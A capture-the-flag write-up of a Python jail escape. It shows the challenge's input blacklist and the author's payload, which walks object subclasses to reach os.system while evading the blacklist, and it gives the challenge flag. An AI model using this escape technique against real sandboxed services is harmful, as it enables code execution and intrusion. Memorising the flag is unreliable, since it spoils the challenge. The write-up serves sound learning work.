Rating:
Setting up a new coding environment for my data science students. Some of them are l33t h4ck3rs that got RCE and crashed my machine a few times :(. Can you help test this before I use it for my class? Two sandboxes should be better than one...
nc pwn.chal.csaw.io 5011
FLAG = flag{y4_sl1th3r3d_0ut}
This challenge is a Python jail escape. This being the first Python jail escape I have ever tried and completed I will give a brief summary of how I completed it the unintended way.
While skimming the python script I saw a check to see if the users input was in a blacklist.
command = input(">>> ")
if any([x in command for x in blacklist.BLACKLIST]):
raise Exception("not allowed!!")
So I connected to the server and ran the following command to get all the words that were blacklisted.
print(blacklist.BLACKLIST)
['__builtins__', '__import__', 'eval', 'exec', 'import',
'from', 'os', 'sys', 'system', 'timeit', 'base64commands',
'subprocess', 'pty', 'platform', 'open', 'read', 'write',
'dir', 'type']
At this point I knew what commands I couldn't use and got completely stuck. I looked up other python jail escape CTF challenges and came across two helpful writeups.
Escaping Python Jails Python SSTI
It took me a lot of trial and error to finally come up with this over engineered script.
print(''.__class__.__mro__[1].__subclasses__()[109].__init__.__globals__['SYS'.lower()].modules['OS'.lower()].__dict__['SYSTEM'.lower()]('cat flag.txt'))
I did look at the server to see where the flag was and I found the intended solution in the same directory as the flag.
I learned a lot from this challenge and hopefully will complete more of these.
